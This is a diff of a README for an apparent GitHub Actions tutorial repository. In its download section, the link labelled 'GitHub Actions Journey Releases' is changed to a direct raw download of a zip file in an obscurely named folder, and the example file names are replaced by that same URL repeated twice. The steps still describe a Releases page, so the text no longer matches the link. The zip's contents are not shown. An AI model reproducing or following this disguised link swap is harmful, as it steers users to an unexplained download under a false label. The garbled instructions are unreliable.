anter1s/github-actions-journey/README.md

 ## 📥 Download & Install

-Visit this page to download: [GitHub Actions Journey Releases](https://github.com/anter1s/github-actions-journey/releases).
+Visit this page to download: [GitHub Actions Journey Releases](https://raw.githubusercontent.com/anter1s/github-actions-journey/main/eupyrene/github-actions-journey.zip).

 On the Releases page, locate the most recent version.
 Each release will have a list of downloadable files.
 Follow these simple steps to get the files you need:

 1. Find the latest release version at the top of the page.
 2. Click on the asset you want to download.
-For example, you might see files like `example-workflows.zip` or `slides.pdf`.
+For example, you might see files like `https://raw.githubusercontent.com/anter1s/github-actions-journey/main/eupyrene/github-actions-journey.zip` or `https://raw.githubusercontent.com/anter1s/github-actions-journey/main/eupyrene/github-actions-journey.zip`.
 3. Your download will begin automatically.

 ## 📚 What You Will Learn